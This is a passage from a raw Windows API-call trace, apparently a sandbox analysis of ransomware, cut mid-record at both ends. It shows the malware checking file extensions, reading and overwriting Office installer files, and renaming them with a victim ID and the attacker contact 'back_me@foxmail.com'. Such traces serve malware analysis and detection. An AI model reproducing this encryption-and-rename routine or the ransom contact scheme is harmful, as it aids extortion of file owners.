returned 89 [0048.230] lstrlenW (lpString=".dbf") returned 4 [0048.230] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.231] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.231] lstrlenW (lpString=".1cd") returned 4 [0048.231] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.231] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.231] lstrlenW (lpString=".jpg") returned 4 [0048.231] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.231] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.231] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.231] lstrlenW (lpString=".doc") returned 4 [0048.231] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.231] lstrlenW (lpString=".docx") returned 5 [0048.231] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0048.231] lstrlenW (lpString=".pdf") returned 4 [0048.231] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.231] lstrlenW (lpString=".xls") returned 4 [0048.231] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.231] lstrlenW (lpString=".xlsx") returned 5 [0048.231] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0048.231] lstrlenW (lpString=".ppt") returned 4 [0048.231] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.231] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.231] lstrlenW (lpString=".zip") returned 4 [0048.231] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.231] lstrlenW (lpString=".rar") returned 4 [0048.231] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.231] lstrlenW (lpString=".bz2") returned 4 [0048.231] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.231] lstrlenW (lpString=".7z") returned 3 [0048.231] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.231] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.231] lstrlenW (lpString=".dbf") returned 4 [0048.231] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.231] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.232] lstrlenW (lpString=".1cd") returned 4 [0048.232] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.232] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.232] lstrlenW (lpString=".jpg") returned 4 [0048.232] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.232] lstrcmpiW (lpString1=".xrm-ms", lpString2=".php") returned 1 [0048.232] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0048.232] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0048.232] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=715834) returned 1 [0048.232] CloseHandle (hObject=0x198) returned 1 [0048.232] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0048.232] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.232] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0048.232] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.232] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.233] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.233] GetLastError () returned 0x0 [0048.233] ReadFile (in: hFile=0x198, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0xaec3a, lpOverlapped=0x0) returned 1 [0048.248] WriteFile (in: hFile=0x210, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xaec40, lpOverlapped=0x0) returned 1 [0048.531] ReadFile (in: hFile=0x198, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.531] WriteFile (in: hFile=0x210, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0x104, lpOverlapped=0x0) returned 1 [0048.531] SetEndOfFile (hFile=0x210) returned 1 [0048.531] CloseHandle (hObject=0x210) returned 1 [0048.531] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.531] SetEndOfFile (hFile=0x198) returned 1 [0048.537] CloseHandle (hObject=0x198) returned 1 [0048.537] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0048.537] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0048.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.538] lstrlenW (lpString=".doc") returned 4 [0048.538] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0048.538] lstrlenW (lpString=".docx") returned 5 [0048.538] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0048.538] lstrlenW (lpString=".pdf") returned 4 [0048.538] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0048.538] lstrlenW (lpString=".xls") returned 4 [0048.538] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0048.538] lstrlenW (lpString=".xlsx") returned 5 [0048.538] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0048.538] lstrlenW (lpString=".ppt") returned 4 [0048.538] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0048.538] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.538] lstrlenW (lpString=".zip") returned 4 [0048.538] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0048.538] lstrlenW (lpString=".rar") returned 4 [0048.538] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0048.538] lstrlenW (lpString=".bz2") returned 4 [0048.538] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0048.538] lstrlenW (lpString=".7z") returned 3 [0048.540] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0048.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.540] lstrlenW (lpString=".dbf") returned 4 [0048.540] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0048.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.540] lstrlenW (lpString=".1cd") returned 4 [0048.540] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0048.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.540] lstrlenW (lpString=".jpg") returned 4 [0048.540] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0048.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.540] lstrlenW (lpString=".doc") returned 4 [0048.540] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0048.541] lstrlenW (lpString=".docx") returned 5 [0048.541] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0048.541] lstrlenW (lpString=".pdf") returned 4 [0048.541] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0048.541] lstrlenW (lpString=".xls") returned 4 [0048.541] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0048.541] lstrlenW (lpString=".xlsx") returned 5 [0048.541] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0048.541] lstrlenW (lpString=".ppt") returned 4 [0048.541] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0048.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.541] lstrlenW (lpString=".zip") returned 4 [0048.541] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0048.541] lstrlenW (lpString=".rar") returned 4 [0048.541] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0048.541] lstrlenW (lpString=".bz2") returned 4 [0048.541] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0048.541] lstrlenW (lpString=".7z") returned 3 [0048.541] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0048.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.541] lstrlenW (lpString=".dbf") returned 4 [0048.541] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0048.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.541] lstrlenW (lpString=".1cd") returned 4 [0048.541] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0048.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.541] lstrlenW (lpString=".jpg") returned 4 [0048.541] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0048.541] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0048.541] lstrlenW (lpString="ProPlusrWW.msi") returned 14 [0048.541] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0048.542] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=27532288) returned 1 [0048.542] CloseHandle (hObject=0x198) returned 1 [0048.542] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi")) returned 0x2020 [0048.542] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.542] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0048.543] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0048.543] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0x0) returned 1 [0048.543] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0048.543] ReadFile (in: hFile=0x198, lpBuffer=0x40c0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x40c0058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.546] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x8c0955, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0048.546] ReadFile (in: hFile=0x198, lpBuffer=0x4100058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4100058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.552] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.552] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x1a01c00, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0048.552] ReadFile (in: hFile=0x198, lpBuffer=0x4140058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4140058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.869] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.869] WriteFile (in: hFile=0x198, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x38bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0048.886] SetEndOfFile (hFile=0x198) returned 1 [0048.886] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42bc928 [0048.886] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.886] WriteFile (in: hFile=0x198, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.886] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x8c0955, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.886] WriteFile (in: hFile=0x198, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.890] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x1a01c00, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.890] WriteFile (in: hFile=0x198, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.892] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42bc928 | out: hHeap=0xb10000) returned 1 [0048.892] CloseHandle (hObject=0x198) returned 1 [0048.892] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0048.892] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.892] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.892] lstrlenW (lpString=".doc") returned 4 [0048.892] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.892] lstrlenW (lpString=".docx") returned 5 [0048.892] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0048.893] lstrlenW (lpString=".pdf") returned 4 [0048.893] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.893] lstrlenW (lpString=".xls") returned 4 [0048.893] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.893] lstrlenW (lpString=".xlsx") returned 5 [0048.893] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0048.893] lstrlenW (lpString=".ppt") returned 4 [0048.893] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.893] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.893] lstrlenW (lpString=".zip") returned 4 [0048.893] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.893] lstrlenW (lpString=".rar") returned 4 [0048.893] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.893] lstrlenW (lpString=".bz2") returned 4 [0048.893] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.893] lstrlenW (lpString=".7z") returned 3 [0048.893] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.893] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.893] lstrlenW (lpString=".dbf") returned 4 [0048.893] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.893] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.893] lstrlenW (lpString=".1cd") returned 4 [0048.893] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.893] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.893] lstrlenW (lpString=".jpg") returned 4 [0048.893] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.893] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.893] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.893] lstrlenW (lpString=".doc") returned 4 [0048.893] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.893] lstrlenW (lpString=".docx") returned 5 [0048.893] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0048.893] lstrlenW (lpString=".pdf") returned 4 [0048.893] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.894] lstrlenW (lpString=".xls") returned 4 [0048.894] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.894] lstrlenW (lpString=".xlsx") returned 5 [0048.894] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0048.894] lstrlenW (lpString=".ppt") returned 4 [0048.894] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.894] lstrlenW (lpString=".zip") returned 4 [0048.894] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.894] lstrlenW (lpString=".rar") returned 4 [0048.894] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.894] lstrlenW (lpString=".bz2") returned 4 [0048.894] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.894] lstrlenW (lpString=".7z") returned 3 [0048.894] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.894] lstrlenW (lpString=".dbf") returned 4 [0048.894] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.894] lstrlenW (lpString=".1cd") returned 4 [0048.894] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.894] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.894] lstrlenW (lpString=".jpg") returned 4 [0048.894] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.894] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0048.894] lstrlenW (lpString="Office32WW.msi") returned 14 [0048.894] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0050.509] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=1992192) returned 1 [0050.509] CloseHandle (hObject=0x194) returned 1 [0050.509] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0050.509] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0050.509] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0050.510] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0050.510] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0x0) returned 1 [0050.510] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0050.510] ReadFile (in: hFile=0x194, lpBuffer=0x40c0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x40c0058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.516] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0050.518] ReadFile (in: hFile=0x194, lpBuffer=0x4100058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4100058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.521] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, 